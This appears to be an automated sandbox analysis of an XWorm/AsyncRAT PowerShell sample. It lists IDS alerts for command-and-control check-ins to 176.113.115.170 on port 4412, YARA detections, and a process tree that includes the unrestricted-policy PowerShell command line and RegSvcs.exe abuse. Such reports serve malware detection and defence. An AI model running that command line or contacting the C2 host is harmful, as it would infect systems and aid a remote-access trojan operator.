                                      2025-01-02T09:01:59.844101+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.194685+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.408598+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:05.410728+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.530671+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:05.532098+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.656172+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:05.657495+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.777918+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:05.779347+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:05.899222+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:05.900522+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:11.127964+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:11.129551+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:15.148726+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:17.643130+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:17.645317+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:19.299011+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:19.300975+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:28.080337+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:28.085409+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:33.299246+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:33.303708+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:33.421388+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:33.422984+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:33.547281+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:33.552193+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:42.768580+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:42.770698+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:45.159706+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:46.975079+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:47.006775+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:50.869745+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:50.871844+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:51.380265+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:02:51.386752+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:02:51.544922+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:04.675210+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:04.676686+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:13.377895+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:13.379924+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:15.176040+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:18.613472+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:18.615397+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:24.005880+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:24.007936+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:29.143839+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:03:29.145691+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:03:29.267647+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:03:29.269217+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:03:35.330845+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:03:35.332634+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:03:45.324246+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:04:03.077628+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP

Target ID: 0
Start time: 03:00:07
Start date: 02/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1"
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:00:07
Start date: 02/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 03:00:10
Start date: 02/01/2025
Path: C:\Windows\System32\ipconfig.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\ipconfig.exe" /flushdns
Imagebase: 0x2a0000
File size: 35'840 bytes
MD5 hash: 62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

                                      Target ID:10
                                      Start time:03:00:13
                                      Start date:02/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                      Imagebase:0xf00000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:18
                                      Start time:04:28:18
                                      Start date:02/01/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420
                                      Imagebase:0x250000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
